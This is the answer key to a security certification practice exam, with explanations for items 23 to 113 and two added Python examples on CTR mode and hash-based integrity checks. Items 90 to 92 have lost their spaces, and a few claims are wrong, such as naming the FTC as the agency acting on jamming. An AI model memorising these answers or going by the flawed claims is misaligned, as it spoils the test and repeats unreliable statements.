23. C. Geoff is looking for a warm site, which has some or all of the infrastructure and systems he needs but does not have data. If a disaster occurs, Geoff can bring any equipment that he needs or wants to the site along with his organization’s data to resume operations. A hot site is a fully functional environment with all the hardware, software, and data needed to operate an organization. They are expensive to maintain and run but are used by organizations that cannot take the risk of downtime. A cold site is a location that can be brought online but does not have systems; cold sites typically have access to power and bandwidth but need to be fully equipped to operate after a disaster since they are just rented space. An RTO is a recovery time objective, and it measures how long it should take to resume operations; it is not a type of disaster recovery site.

24. B. If Olivia wants to ensure that third parties will be unable to modify the operating system for Internet of Things (IoT) devices, requiring signed and encrypted firmware for operating system updates is an effective means of stopping all but the most advanced threats. Setting a default password means that a common password will be known. Checking the MD5 sum for new firmware versions will help administrators validate that the firmware is legitimate, but signed and encrypted firmware is a much stronger control. Finally, regular patching may help secure the devices but won’t prevent OS modifications.

25. B. After quantum encryption and decryption technologies become mainstream, it is generally believed that nonquantum cryptosystems will be defeated with relative ease, meaning that quantum cryptography will be required to be secure. Qubits are quantum bits, not a measure of speed; quantum encryption will be the relevant solution in a post-quantum encryption world; and even very long RSA keys are expected to be vulnerable.

26. B. Counter mode (CTR) makes a block cipher into a stream cipher by generating a keystream block using a nonrepeating sequence to fill in the blocks. This allows data to be streamed instead of waiting for blocks to be ready to send. It does not perform the reverse, turning a stream cipher into a block cipher, nor does it reverse the encryption process (decryption). Public keys cannot unlock private keys; they are both part of an asymmetric encryption process.
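The keystream construction in answer 26, as an added example that is not from the book: each nonce||counter block is run through the block cipher and the output is XORed with the data, so encryption and decryption are the same operation and no padding is needed. It assumes HMAC-SHA256 truncated to 16 bytes as a stand-in for a real block cipher such as AES (so it runs with the standard library), an 8-byte nonce, and constructed sample messages.

```python
import hashlib
import hmac
from typing import Callable

BLOCK_SIZE = 16   # bytes; the same block size AES uses
NONCE_SIZE = 8    # bytes; the remaining 8 bytes of each block hold the counter


def make_block_function(key: bytes) -> Callable[[bytes], bytes]:
    """Return a stand-in for a block cipher's encrypt-one-block operation.

    Assumption: a real deployment would use AES here. HMAC-SHA256 truncated
    to one block is used only so the example runs offline; it keeps the
    property CTR relies on, a keyed pseudorandom function of each counter block.
    """
    def encrypt_block(block: bytes) -> bytes:
        if len(block) != BLOCK_SIZE:
            raise ValueError("block cipher input must be exactly one block")
        return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK_SIZE]
    return encrypt_block


def ctr_keystream(encrypt_block: Callable[[bytes], bytes],
                  nonce: bytes, length: int) -> bytes:
    """Generate `length` keystream bytes by encrypting nonce||counter blocks.

    The counter increments for every block, so no counter block repeats under
    one nonce: that is the "nonrepeating sequence" CTR mode depends on.
    """
    if len(nonce) != NONCE_SIZE:
        raise ValueError("nonce must be %d bytes" % NONCE_SIZE)
    stream = bytearray()
    counter = 0
    while len(stream) < length:
        counter_block = nonce + counter.to_bytes(BLOCK_SIZE - NONCE_SIZE, "big")
        stream += encrypt_block(counter_block)
        counter += 1
    return bytes(stream[:length])


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt `data`: CTR is its own inverse, so one function serves both.

    Only as many keystream bytes as there are data bytes are used, so the
    output is exactly as long as the input and no padding is involved.
    """
    keystream = ctr_keystream(make_block_function(key), nonce, len(data))
    return bytes(d ^ k for d, k in zip(data, keystream))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings; used to show why a nonce must never be reused."""
    return bytes(x ^ y for x, y in zip(a, b))


if __name__ == "__main__":
    # Constructed sample values.
    key = b"\x11" * 32
    nonce = bytes(range(8))
    message = b"streamed without padding"
    ciphertext = ctr_crypt(key, nonce, message)
    print(len(ciphertext) == len(message), ctr_crypt(key, nonce, ciphertext) == message)
    # Reusing a nonce under the same key makes the keystream identical, so
    # XORing two ciphertexts cancels it and exposes the XOR of the plaintexts.
    c1 = ctr_crypt(key, nonce, b"attack at dawn!!")
    c2 = ctr_crypt(key, nonce, b"retreat at noon!")
    print(xor_bytes(c1, c2) == xor_bytes(b"attack at dawn!!", b"retreat at noon!"))
```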

27. D. Blockchain public ledgers contain an identity for participants (although the identity may be semi-anonymous), the transaction record, and the balance or other data that the blockchain is used to store. Since there is no central authority, there is no token to identify authorities.

28. C. A test server should be identical to the production server. This can be used for functional testing as well as security testing, before deploying the application. The production server is the live server. A development server would be one the programmers use during development of a web application, and predeployment server is not a term typically used in the industry.

29. C. Staging environments, sometimes called preproduction environments, are typically used for final quality assurance (QA) and validation before code enters the production environment as part of a deployment pipeline. Staging environments closely mirror production, allowing realistic testing and validation to be done. Development and test environments are used to create the code and for testing while it is being developed.

30. C. Application programming interface (API) keys are frequently used to meet this need. An API key can be issued to an individual or organization, and then use of the API can be tracked to each API key. If the API key is compromised or abused, it can be revoked and a new API key can be issued. Firewall rules written to use public IP addresses can be fragile, since IP addresses may change or organizations may have a broad range of addresses that may be in use, making it hard to validate which systems or users are using the API. Credentials, including passwords, are not as frequently used as API keys.

31. D. Embedded systems like smart meters typically do not include a SQL server to attack, making SQL injection an unlikely issue. Derek should focus on securing the traffic from his meter, ensuring that denial-of-service (DoS) attacks are difficult to accomplish and that remotely disconnecting the meter using exposed administrative interfaces or other methods is prevented.

32. A. Honeypots are systems configured to appear to be vulnerable. Once an attacker accesses them, they capture data and tools while causing the attacker to think that they are successfully gaining control of the system. This allows defenders like Selah to study and analyze their techniques and tools without endangering their production systems. An intrusion detection system (IDS) or intrusion protection system (IPS) can detect and stop attacks, and may even capture some tools, but they are not designed to capture local commands and downloaded tools. A WAF is a web application firewall and is intended to stop attacks on web applications.

33. D. Honeynets are intentionally vulnerable networks set up to allow for capture and analysis of attacker techniques and tools. A black hole is a term commonly used for a system or network device where traffic is discarded, and black hole routing involves sending traffic to a null route that goes nowhere.

34. B. Maria should implement ongoing auditing of the account usage on the SCADA system. This will provide a warning that someone’s account is being used when they are not actually using it. Host-based antivirus is almost never a bad idea, but this scenario did not indicate that the compromise was due to malware, so antimalware may not address the threat. Since the engineer has access to the SCADA system, a network intrusion prevention system (NIPS) is unlikely to block them from accessing the system, and full-disk encryption (FDE) will not mitigate this threat because the system is live and running, meaning that the disk will be decrypted in use.

35. B. Both Advanced Encryption Standard (AES) and Data Encryption Standard (DES) are block ciphers. That means that they encrypt groups (blocks) of plain-text symbols together as a single block. If you know that either AES or DES is a block cipher, you can eliminate half of the options here. If you know that a block cipher works on groups of symbols or blocks of text, you can also eliminate half the options as incorrect.

36. A. A hardware security module (HSM) is the most secure way to store private keys for the e-commerce server. An HSM is a physical device that safeguards and manages digital keys. Full-disk encryption (FDE) will protect the data on the e-commerce server, but it won’t help store the key. It is also difficult to fully encrypt the e-commerce server drive, since the drive will need to be in use for the e-commerce to function. A self-encrypting drive (SED) is merely automatic full-disk encryption. Software-defined networking (SDN) won’t address the issues in this scenario, since it configures networks via software and does not provide secure key storage.

37. B. Transit gateways are a transit hub used to connect VPCs (virtual private clouds) to on-premises networks. You can read more about transit gateways at docs.aws.amazon.com/vpc/latest/tgw/what-is-transit-gateway.html. IBM uses the same term, but for a very specific internal cloud connection.

38. C. You should implement a staging server so that code can be deployed to an intermediate staging environment. This will allow testing of security features, as well as checking to see that the code integrates with the entire system. Using third-party libraries and software development kits (SDKs) can help reduce errors and vulnerabilities in the code. Sandboxing is used to isolate a particular environment, and virtualization will not mitigate this risk. Even if the production server is virtualized, the risks are the same. Finally, deployment policies are a good idea, but they are not the most effective way to mitigate this particular risk.

39. C. Ian should be concerned that attackers might be able to redirect short message service (SMS) messages sent to VoIP phones. This potential issue is one reason that some multifactor deployments do not allow SMS messages to be sent to VoIP phones in the environment, and some organizations do not allow SMS as an option, instead requiring hardware tokens or application-based multifactor authentication. Vishing is a type of phishing done via voice, voicemail hijacking would redirect voicemail to another mailbox by forwarding calls, and weak multifactor code injection was made up for this question.

40. A. Baseline configurations, per NIST 800-53: “Baseline configurations serve as a basis for future builds, releases, and/or changes to information systems. Baseline configurations include information about information system components (e.g., standard software packages installed on workstations, notebook computers, servers, network components, or mobile devices; current version numbers and patch information on operating systems and applications; and configuration settings/parameters), network topology, and the logical placement of those components within the system architecture. Maintaining baseline configurations requires creating new baselines as organizational information systems change over time. Baseline configurations of information systems reflect the current enterprise architecture.”

41. B. HVAC systems are an important part of the availability for systems and infrastructure. They are also a target for attackers who target Internet of Things (IoT) or network-connected devices. They are not frequent targets for use in social engineering efforts, although they could be used that way. They are not a primary line of defense for organizations.

42. B. Symmetric encryption is typically faster than asymmetric encryption. This is why many protocols use asymmetric encryption to exchange a symmetric key, and then use that key for the rest of their transaction. It is not more secure, key length is not a meaningful difference between symmetric and asymmetric encryption, and key distribution for symmetric encryption is more challenging for larger populations using symmetric encryption if confidentiality needs to be maintained because every potential pair of communicators would need a different symmetric key.

43. C. Entropy is a measure of uncertainty. Having sources of entropy (or randomness) is a key element in a PRNG. Some pseudo-random number generators rely on input from keyboards, mice, or other human-generated inputs to have a source of entropy data.

44. A. With the software as a service (SaaS) model, the consumer has the ability to use applications provided by the cloud provider over the Internet. SaaS is a subscription service where software is licensed on a subscription basis. Platform as a service (PaaS) provides the framework and underlying tools to build applications and services. Infrastructure as a service (IaaS) provides the components of an entire network and systems infrastructure. Hybrid models use both cloud and locally hosted systems.

45. C. Resource policies are associated with a resource and allow you to determine which principals have access to that resource as well as what actions they can take on it. Resource policies are not used to set consumption limits.

46. D. Storage area network (SAN) replication copies the contents of one repository to another repository, such as an organization’s central SAN environment to a remote SAN at the hardware or block level.

47. C. A snapshot is an image of the virtual machine (VM) at some point in time. It is standard practice to periodically take a snapshot of a virtual system so that you can return that system to a last known good state. Sandboxing is the process of isolating a system or software. The hypervisor is the mechanism through which the virtual environment interacts with the hardware, and elasticity is the ability for the system to scale.

48. D. RAID level 5 is disk striping with distributed parity. It can withstand the loss of any single disk. RAID 0 is disk striping; it does not provide any fault tolerance. RAID 1 is mirroring. It does protect against the loss of a single disk but not with distributed parity. RAID 3 is disk striping with dedicated parity. This means a dedicated drive containing all the parity bits.

49. D. A Faraday cage, named after physicist Michael Faraday, involves placing wire mesh around an area or device to block electromagnetic signals. A VLAN can segment a network but won’t block electromagnetic interference (EMI). Software-defined networking (SDN) virtualizes a network but does not protect against EMI. A Trusted Platform Module (TPM) is used for cryptographic applications.

50. B. The correct answer is bollards. These are large objects, often made of concrete or similar material, designed specifically to prevent a vehicle getting past them. Most gates can be breached with a vehicle. A security guard is a good idea, but they would not be able to stop a vehicle from ramming the building. Security cameras will provide evidence of a crime that was committed but won’t prevent the crime.

51. A. Attaching cable locks to the computers and locking them to the table will make it more difficult for someone to steal a computer. Full-disk encryption (FDE) won’t stop someone from stealing the computer, nor will strong passwords. A sign-in sheet is a good idea and may deter some thefts, but it is not the best approach to stopping theft offered in this scenario.

52. B. The correct answer is to incorporate two-factor authentication with a mantrap. By having a smartcard at one door (type II authentication) and a PIN number (type I authentication) at the other door, Joanne will combine strong two-factor authentication with physical security. Smartcards by themselves, or paired with a fence, are still single-factor authentication. Video surveillance, though often a good idea, won’t help with two-factor authentication.

53. A. Baselining is the process of establishing a standard for security. A change from the original baseline configuration is referred to as baseline deviation. Security evaluations or audits check security but don’t establish security standards. Hardening is the process of securing a given system, but it does not establish security standards. Normalization is the process of removing redundant entries from a database.

54. A. Fake telemetry is telemetry created to make an attacker believe that a honeypot system is a legitimate system. Building a believable honeypot requires making the system as realistic as possible. Deepfakes are artificial intelligence (AI)-created videos that make it appear that individuals are saying or doing actions they never actually performed. The rest of the options were made up for this question.

55. A. RAID 1+0, or RAID 10, is a mirrored data set (RAID 1), which is then striped (RAID 0): a “stripe of mirrors.” RAID 6 is disk striping with dual parity (distributed), RAID 0 is just striping, and RAID 1 is just mirroring.

56. D. Normalization is the process of removing duplication or redundant data from a database. There are typically four levels of normalization ranging from 1N at the lowest (i.e., the most duplication) to 4N at the highest (i.e., the least duplication). Although database integrity is important, that is not what is described in the question. Furthermore, integrity checking usually refers to checking the integrity of files. Deprovisioning is a virtualization term for removing a virtual system (server, workstation, etc.) and reclaiming those resources, and in the context of identity management means removing an account or permissions. Baselining involves setting security standards.

57. C. Remote Authentication Dial-in User Service (RADIUS) provides authentication, authorization, and accounting, which make up the three critical elements in AAA systems. OpenID is a protocol for authentication but does not provide authorization by itself. Lightweight Directory Access Protocol (LDAP) is a directory service, and Security Assertion Markup Language (SAML) is a markup language for making security assertions.

58. D. TLS inspection (often called SSL inspection because the term SSL remains widely, if incorrectly, in use) involves intercepting encrypted traffic between the client and server. TLS interception devices act as an on-path attack and decrypt traffic to scan and analyze it, often for malware or other signs of attacks, and then encrypt it to send it on to its destination. As you might expect, TLS inspection has both legitimate and malicious uses.

59. D. In most cases none of these options are practical. Destruction of drones is an illegal destruction of private property. Jamming the open frequencies used for drones is not permissible and may result in action by the Federal Trade Commission (FTC), and contacting the Federal Aviation Administration (FAA) to request that the airspace above a company be declared a no-fly zone is not something the FAA supports in most cases. This means that Diana is likely to have to deal with the potential for drone-based threats in other ways.

60. B. Isaac has built and configured a system where nonpersistence of systems can create forensic challenges. His organization needs to consider how they can make copies of compromised or problematic ephemeral systems and store them in a safe location for forensic analysis. This is not a forensic-resistant system—if he had a copy, he would have been able to analyze it. Live-boot media is not mentioned or used in this example, and terminate and stay resident (TSR) is a type of program run in the DOS operating system that returned control to the operating system but remained in memory so that it could be easily run again as needed.

61. D. Stored procedures are the best way to have standardized SQL. Rather than programmers writing their own SQL commands, they simply call the stored procedures that the database administrator creates. Formal code inspection might detect a lack of security practices and defenses but won’t stop SQL-based attacks. Policies requiring stored procedures might help but are a less direct path to the solution. Finally, agile programming is a method for developing applications rapidly and won’t determine how SQL commands are created.

62. C. Services integration in cloud and virtualization environments can be very complex and can involve data, APIs, and other types of application integration. Integration platforms allow organizations to use a standardized tool rather than building and maintaining their own. This allows them to focus on the actual integrations rather than the underlying system, saving time and effort. Since integration platforms also often have preexisting tools for common services and APIs, they can save significant amounts of time for organizations that adopt them. Of course, this also introduces another platform to assess and secure.

63. B. When virtualization reaches the point that IT can no longer effectively manage it, the condition is known as VM sprawl. VM overload and VM spread are made up for this question, and a VM zombie is a term for a virtual machine that is running and consuming resources but no longer has a purpose.

64. A. VM escape is a situation wherein an attacker is able to go through the VM to interact directly with the hypervisor and potentially the host operating system. The best way to prevent this is to limit the ability of the host and the VM to share resources. If possible, they should not share any resources. Patching might mitigate the situation, but it is not the most effective solution. Using firewalls and antimalware tools is a good security practice but would have minimal effect on mitigating VM escape.

65. A. Irene is looking for a software-as-a-service (SaaS) tool that allows her to perform the specific function that her organization needs to accomplish. An SaaS service does not require system administration or programming and typically requires minimal configuration to perform its normal functionality. Platform-as-a-service (PaaS) typically requires some configuration or programming, and infrastructure-as-a-service (IaaS) will require systems administration, programming, or configuration—or all three! Identity-as-a-service (IDaaS) is a specific type of solution that was not described as part of Irene’s needs.

66. D. Serverless architectures do not require a system administrator because the provider manages the underlying function-as-a-service (FaaS) capability. It can also scale up or scale down as needed, allowing it to be very flexible. Serverless architectures are typically not ideal for complex applications and instead tend to work better for microservices.

67. A. The correct answer is to have a motion-activated camera that records everyone who enters the server room. Motion recognition is an important feature in this type of scenario, where cameras operate in a space where there is little physical traffic and storage would be wasted by recording empty, unused spaces. Smartcards, deadbolts, and logging won’t detect theft.

68. C. A Domain Name System (DNS) sinkhole is a DNS server used to spoof DNS servers that would normally resolve an unwanted or malicious hostname. Traffic can be sent to a legitimate system, causing warnings to appear on the user’s screen, or simply sent to a null route or nonexistent system. An intrusion detection system (IDS) cannot stop traffic, round-robin DNS is a way to spread DNS traffic, and a WAF is a web application firewall, and nothing in this question indicates that there is a web-specific issue.

69. C. Hot aisle/cold aisle is a layout design for server racks and other computing equipment in a datacenter. The goal of a hot aisle/cold aisle configuration is to conserve energy and lower cooling costs by managing airflow. An infrared camera will detect heat levels on the aisles. Although the rest of the options are potential issues for a datacenter, an infrared camera won’t help with them.

70. D. A security guard is the most effective way to prevent unauthorized access to a building. Options A, B, and C are all incorrect. These are all good physical security measures, but they are not the most effective ways to prevent entry into a building.

71. B. Software-defined networking (SDN) makes the network very scalable. It is relatively easy to add on new resources or remove unneeded resources, and it helps with high availability efforts. SDN does not stop malware, detect intrusions, or prevent session hijacking.

72. A. The correct answer is to use an application container to isolate that application from the host operating system. Application containers provide a virtualized environment in which to run an application. Moving to software-defined networking (SDN) is a very involved process and does not provide an efficient solution. Running the application in a separate VLAN will not separate the application from the host operating system; it might not solve the problem. Since this is a legacy application, insisting on an updated version of the application isn’t feasible.

73. D. Each of the options above is a potential risk when using third-party libraries or SDKs. Organizations need to understand and assess the risks of third-party code, but it is a common practice to use third-party libraries. Identifying trustworthy and reliable sources and managing the versions and updates are critical to using third-party components safely.

74. B. A cloud access security broker (CASB) is used to monitor cloud activity and usage and to enforce security policies on users of cloud services.

75. A. Microservice architectures build applications as a set of loosely coupled services that provide specific functions using lightweight protocols. It doesn’t specifically define the size of the systems, but it is not a tightly coupled environment. Protocol choice is often open standards-based, but the emphasis is on lightweight protocols. There is not a requirement that services be in-house or third party exclusively.

76. C. The correct answer is to implement IaC. Infrastructure as code (IaC) is the process of managing and provisioning computer datacenters through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. Whether the datacenter(s) use physical machines or virtual machines, this is an effective way to manage the datacenters. Although datacenter managers may be needed, that won’t necessarily provide consistent management across the enterprise. Software-defined networking (SDN) will not fix this problem, but it would help if she needed to configure and manage her network based on usage and performance. Finally, this issue is not just about provisioning; it is about management.

77. D. OAuth is a common authorization service used for cloud services. It allows users to decide which websites or applications to entrust their information to without requiring them to give them the user’s password. OpenID is frequently paired with OAuth as the authentication layer. Kerberos is more frequently used for on-site authentication, and SAML is Security Assertion Markup Language.

78. C. In this scenario Greg should identify the use of the printers for further attacks against the organization as the most critical risk. Use as part of a distributed denial-of-service (DDoS) attack does not directly impact the organization in most cases, exhausting supplies would be an annoyance, and the risk of scanning documents from a remote location requires sensitive documents to be left in the MFPs. Greg should note that all of these issues could be problems and move the MFPs to a protected network so that third parties can’t access them.

79. D. The systems that Keith has deployed are thin clients, computers that do not run their applications and storage from their local drives and instead rely on a remote server. Cloud and virtualization implementations of this providing virtual desktops are called VDI, or Virtual Desktop Infrastructure, but do not necessarily require a thin client, since they can work on a fully capable computer (or thick client). Client-as-a-server is a made-up term.

80. B. This real-world example was found in 2020 when malicious PowerShell code was discovered that triple-encoded malicious tools. The initial package was downloaded as an image from imgur.com or similar sites and was concealed using steganographic techniques. The code was also encrypted using RSA and encoded in Base64 both prior to encryption and again after encryption. Although steganography is not incredibly common, Henry should suspect that a downloaded image may be more than it appears.

81. A. Storing data in plain text will not help prevent data exposure and, in fact, is more likely to result in data exposure. Instead, Molly should encourage her developers to store and transmit sensitive data in an encrypted form. They should also leverage HTTPS for all authenticated pages, and potentially all pages. Hashing passwords using salts is important for password security, and ensuring that tokens are not exposed via sites like GitHub or other public code repositories is important for application and data security.

82. C. Using secure firmware, as well as using an RTOS with time and space partitioning, are both common methods to help ensure RTOS security. Unlike traditional operating systems, real-time operating systems are used in applications where they need to deal with inputs immediately. That means that adding additional load like firewalls and antimalware is not a typical component in RTOS applications. For similar reasons, you’re unlikely to find a web browser on most devices running an RTOS.

83. B. In a code reuse attack, the attacker executes code that is meant for some other purposes. In many cases this can be old code that is no longer even used (dead code), even if that code is in a third-party library. A buffer overflow occurs when too much data is sent to a buffer. For example, say a buffer is designed to hold 10 bytes, and it is sent 100 bytes, causing the additional data to be put into unexpected memory locations. A denial-of-service (DoS) attack is meant to make a service or system unavailable to legitimate users. Session hijacking involves taking over an existing authenticated session.

84. C. Zigbee is specifically designed for this type of usage. Narrowband radios are not typically in use for this type of purpose, and baseband radio requires very large antennas to use the low-frequency spectrum. Cellular options require a carrier and are not well suited to direct peer-to-peer configurations.

85. B. Homomorphic encryption can perform computations on the ciphertext without access to the private key that the ciphertext was encrypted with. When the computations are completed, the results are the same as if those computations had been performed against the original plaintext. Identity-preserving and replicable encryption were made up for this question.

86. A. Fingerprint reader systems are the most widely accepted biometric systems in common use for entry access and other purposes today. Facial recognition systems are increasingly in use and are also likely to be more accepted by user populations based on their broad deployment in phones, but they are not listed as an option. Both retina and iris scans are less likely to be accepted, whereas voice systems are both relatively uncommon and more disruptive for frequent usage.

87. C. Tape backups are the most common solution for cold backups off-site. Cloud backups to a cold repository are increasingly popular options and may be faster for some retrieval scenarios, but they are not listed as options. Storage area network (SAN) and network-attached storage (NAS) devices are not commonly used for cold backup and are instead used for online or nearline options. Disk backup could be used but remains less common than tape for a true cold backup scenario.

88. B. Off-site storage has to balance availability and the ability to be used in the event that a disaster or other event occurs. In this case, Allan should look at a facility far enough away that a single disaster cannot take both sites offline.

89. D. Embedded systems can bring a broad range of security implications, many of which are driven by the limited capabilities of the processors and hardware they are frequently built with. Low-power consumption designs may lack computational power and thus have challenges implementing strong cryptography, network connectivity, and other similar problems. Patching embedded systems can be challenging both because of where they are deployed and because of a lack of connectivity for them—in fact, in many environments, you may not want the devices to be connected to your network. Since many don’t have a screen, keyboard, or a network connection, authentication is also a problem. Few embedded devices, however, need bulk storage, making the lack of bulk storage a problem that typically isn’t a major concern.

90. B. Systemonachip(SoC)devicesarecompleteself-containedsystemsonasinglechip.Therefore,havingtheirownuniquecryptographickeysisthebestwaytoimplementauthenticationandsecurity.OptionAisincorrect.Asystemonachipisself-contained,soaTrustedPlatformModule(TPM)wouldnotbeanappropriatesolution.OptionCisincorrect.Aself-encryptingdrive(SED)isnotrelevanttosystemonachip,sincethatsystemdoesnothavea“drive.”OptionDisincorrect.ManySoCtechnologiesdon’tuseaBIOS.

91. A. Suchsystemsneedtohaveallcommunicationsencrypted.Asofthecurrentdate,breachesofportablenetworkdeviceshaveallinvolvedunencryptedcommunications.OptionBisincorrect.Full-diskencryption(FDE)mayormaynotevenbeappropriateforsuchdevices.Manydon’thaveadisktoencrypt.OptionCisincorrect.Itmaynotbepossibletoinstallantimalwareonmanysuchdevices.OptionDisincorrect.Fuzztestingisusedforapplications.

92. D. Themorevehiclesutilizecomputersandhavenetworkcommunicationcapabilities,themoretheywillbevulnerabletocyberattacks.OptionsA,B,andCareallincorrect,asalloftheseareconcernsratherthanjustone.

93. A. An advantage of compiling software is that you can perform static code analysis. That means Amanda can review the source code for flaws and could even remediate flaws if they were found. Both binaries and compiled code can be tested in a live environment (dynamic analysis), and checksums for both can be validated.

94. A. RFCs, or requests for comment, are how Internet protocols are defined and documented. Wikipedia is not the definitive resource, and the Internet Archive actively archives the Internet but does not define protocols.

95. C. Standard naming conventions typically do not help to conceal systems from attackers. Attackers can still scan for systems and may even be able to use the naming convention to identify the purpose of a system if the naming convention includes a purpose or technology in the name. Naming conventions do make standardization easier and can help administrators quickly identify what a machine does, while making it simpler to include systems in scripts. A machine that doesn't match is likely to be a rogue or misconfigured.

96. B. This is an example of a continuous integration/continuous delivery (CI/CD) pipeline. There is no mention of monitoring systems, and although code analysis is happening here in testing, it is dynamic testing, not source code analysis. There is no mention of malware in the pipeline.

97. D. Although gait analysis is not commonly used for identification and authorization purposes, it is used in situations where crowd footage is available to identify individuals. Vein, voiceprint, and fingerprint analysis are not useful in most scenarios involving heavily used and crowded spaces.

98. C. A community cloud presents a compromise solution. Community clouds are semi-private. They are not accessible to the general public but only to a small community of specific entities. There are risks with public clouds, as there are with any environment. Private clouds can be quite expensive to build out, particularly for smaller organizations that cannot afford staffing or hardware. Finally, recommending against a cloud solution does not match the company's stated goal.

99. D. Using infrastructure as a service (IaaS) makes the most sense here; it meets the cloud requirement described and would allow additional systems to be quickly created or removed as needed. Platform as a service (PaaS) does not provide direct access to Linux systems to build out applications and related configuration. Setting up dual boot and building machines are not cloud solutions as described. When you answer questions like this, make sure you read and meet all the requirements in the question.

100. A. One of the dangers of automation and scripting is that the scripts will do exactly what they are written to do. That means that a script like those that Corrine has been asked to write that doesn't have rules that prevent it from blocking critical systems could block those systems. There is no indication in the question of any issues with private IP addresses, and filtering them would require more work. Attackers could potentially use the scripts if they discovered them, but if they're able to access security scripts there is likely a deeper problem. Finally, auditors typically do not review scripts and instead ask about the existence of controls.

101. D. Differential backups back up all of the changes since the last full backup. An incremental backup backs up all changes since the last incremental backup. A snapshot captures machine state and the full drive at a bitwise level, and full backups are a complete copy of a system but typically do not include the memory state.

102. C. The correct answer is a public cloud. Public clouds are usually less expensive. The cloud provider has a number of customers and costs are dispersed. Even individuals can afford to use cloud storage with services like iCloud and Amazon Cloud. A community cloud is usually private for a small group of partners. Each of the partners must share a greater part of the expense than they would with a public cloud, but they retain more control over the cloud than they would with a public cloud. Private clouds are often the most expensive for smaller organizations. The company must completely develop and maintain the cloud resources and cannot leverage shared resources. A hybrid deployment model is a good compromise for many situations, but it will typically be more expensive than a public cloud for a small organization.

103. C. The crossover error rate (CER) is the point where the FAR (false acceptance rate) and the FRR (false rejection rate) cross over. CER provides a means of comparing biometric systems based on their efficiency, with a lower CER being more desirable.

104. B. Elasticity is a cloud computing concept that matches resources to demand to ensure that an infrastructure closely matches the needs of the environment. Scalability is the ability to grow or shrink as needed but does not directly include the concept of matching to workload. Normalization is a code development concept used to ensure that data is in a consistent form.

105. A. An uninterruptable power supply (UPS) should be Nathaniel's first priority. Ensuring that power is not disrupted during an outage and can be maintained for a short period until alternate power like a generator can come online is critical, and a UPS can provide that capability. A generator alone will take longer to come online, resulting in an outage. Dual power supplies can help to build resilience by allowing multiple power sources and avoiding issues if a power supply does fail, but that is not the focus of the question. A managed power distribution unit (PDU) provides remote management and power monitoring but will not prevent power loss in an outage.

106. B. Virtual machine (VM) sprawl refers to a situation in which the network has more virtual machines than the IT staff can effectively manage. The remaining options do not match the term VM sprawl.

107. C. Stored procedures are commonly used in many database management systems to contain SQL statements. The database administrator (DBA), or someone designated by the DBA, creates the various SQL statements that are needed in that business, and then programmers can simply call the stored procedures. Stored procedures are not related to dynamic linked libraries (DLLs). Stored procedures can be called by other stored procedures that are also on the server. Finally, stored procedures are not related to middleware.

108. D. Bollards are large barriers that are often made of strong substances like concrete. They are effective in preventing a vehicle from being driven into a building. None of the other answers match the purpose of a bollard.

109. D. Selah should be concerned about cloning the badges because magnetic stripe badges are relatively simple to clone in most cases. Tailgating is common, particularly if there are large numbers of employees, since employees are unlikely to allow doors to close and then reopen them for every person who enters during shift changes. Since magnetic stripe readers do not require any additional information, use by unauthorized individuals is easy if a badge is lost or stolen.

110. A. Virtual machine (VM) escape attacks rely on a flaw in the hypervisor that could allow an attacker to attack the hypervisor itself. Typical system administration best practices can help, including regular patching of the hypervisor, but in the event of a successful escape attack, limiting damage by keeping VMs of the same sensitivity level isolated to the same host can prevent broader impact. Antivirus is always a good idea and may even stop some malware-based VM escape attacks, but isolating the VM is more effective. Full-disk encryption (FDE) will have no effect since the disk must be unencrypted during operation. A Trusted Platform Module (TPM) is used for storing cryptographic keys.

111. C. Managed security service providers (MSSPs) are outside companies that handle security tasks. Some or even all security tasks can be outsourced, including intrusion detection and prevention (IDS/IPS) management, security information and event management (SIEM) integration, and other security controls. Software-defined networking (SDN) would make managing security somewhat easier but would itself be difficult to implement. Automating as much security activity as is practical would help alleviate the problem but would not be as effective as security as a service. Finally, only implementing a few security controls would likely leave control gaps.

112. B. Cryptographic hashes are used for integrity checking of files, network packets, and a variety of other applications. Storing a cryptographic hash of the application and comparing the application on the network to that hash will confirm (or refute) whether the application has been altered in any way. Network intrusion detection or network intrusion prevention systems (NIDSs/NIPSs) are useful, but they won't prevent an application from being altered. Sandboxing is used to isolate an application, but it won't detect whether it has been tampered with.
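The integrity check that answer 112 describes, as an added Python example (this is not code from the book): a SHA-256 baseline is recorded for a file, the file is re-hashed in chunks later, and the two digests are compared with a constant-time comparison. The file contents, the file name `app.bin`, and the "tampering" are all constructed for the demonstration.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 65536) -> str:
    """Stream the file through SHA-256 so a large binary never has to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_file(path: Path, known_good_hex: str) -> bool:
    """True only if the file's current hash equals the stored baseline.

    hmac.compare_digest does not stop at the first differing character, so the
    comparison time does not reveal how much of the digest matched.
    """
    return hmac.compare_digest(sha256_of_file(path), known_good_hex)


def demo() -> tuple:
    """Baseline a constructed 'application' file, verify it, tamper with it, verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp) / "app.bin"
        original = b"constructed sample application binary v1.0\n"  # constructed content
        app.write_bytes(original)
        baseline = sha256_of_file(app)  # recorded when the application was first approved

        untouched = verify_file(app, baseline)

        # Simulate an unauthorized modification of the deployed file.
        app.write_bytes(original + b"// injected change\n")
        after_tamper = verify_file(app, baseline)

        # The streamed digest must agree with a digest computed over all bytes at once.
        direct = hashlib.sha256(app.read_bytes()).hexdigest()
        streamed_matches_direct = sha256_of_file(app) == direct

    return untouched, after_tamper, streamed_matches_direct


if __name__ == "__main__":
    print(demo())  # (True, False, True)
```

The check is only as trustworthy as the stored baseline: keep the known-good digests somewhere the person or process that could alter the application cannot also rewrite them (a signed manifest or a read-only store), otherwise an altered file can simply be accompanied by an updated hash.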

113. C. Separating the SCADA (Supervisory Control and Data Acquisition) system from the main network makes it less likely that the SCADA system can be affected from the main network. This includes malware as well as human action. Software-defined networking (SDN) would make isolating the SCADA system easier but would not actually isolate it. Patch management is always important, but in this case, it would not have prevented the issue. Encrypted data transmissions, such as TLS, would have no effect on this situation.

